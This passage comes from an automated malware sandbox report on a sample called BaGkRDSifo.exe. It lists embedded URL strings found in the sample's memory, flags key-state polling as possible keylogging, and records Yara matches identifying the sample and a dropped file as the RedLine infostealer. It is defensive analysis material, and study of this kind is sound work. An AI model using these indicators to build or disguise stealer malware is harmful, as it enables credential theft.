Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportDetailByXmlDocumentT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportDetailStringDocumentT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportItemListByAdiconBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportItemListByAdiconBarocde_MeiNianT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportItemListByAdiconRepnoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportItemListByCustomerBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportItemListByCustomerBarocde_MeiNianT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportListV1T
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportUserItemByYYTMT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetReportUserItemT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetSampleCountT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetSampleProcessT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleAiT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleByOtherT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleToStringT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetSearchSampleT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeToByteT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleByCustomerCodeToByteT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetTsscInfoByAdiconBarcodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetTsscInfoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetTsscPicByAdiconBarcodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/GetXmmcListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/LoginT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/MeiNianOriginalDataXmlUpLoadT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/MeiNianOriginalDataXmmcListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/ReportDetailForHzqbT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/ReportDetailT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/ReportDetailbybgrqT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/SelectItemsByCustomerT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/SetSampleDownFlagByAdiconBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/SetSampleDownFlagByByAdiconRepnoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/SetSampleDownFlagByCustomerBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/T
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/UpLoadOrDownLoadByXmlT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/UpLoadXmlT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/UpdateMeiNianZuTaoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/UpdatesSetDownT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/UploadStateT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.adicon.com.cn/ValiUserT
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0B33E628 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_0B33E628
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0B33E61A GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_0B33E61A

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: BaGkRDSifo.exe, type: SAMPLE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\Desktop\STHealthUpdate.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
Detected potential crypto function
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00408C60 0_2_00408C60
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0040DC11 0_2_0040DC11
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00407C3F 0_2_00407C3F
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00418CCC 0_2_00418CCC
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00406CA0 0_2_00406CA0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_004028B0 0_2_004028B0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_0041A4BE 0_2_0041A4BE
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00418244 0_2_00418244
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00401650 0_2_00401650
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00402F20 0_2_00402F20
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_004193C4 0_2_004193C4
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00418788 0_2_00418788
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00402F89 0_2_00402F89
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_00402B90 0_2_00402B90
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_004073A0 0_2_004073A0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe Code function: 0_2_024E2A16 0_2_024E2A16
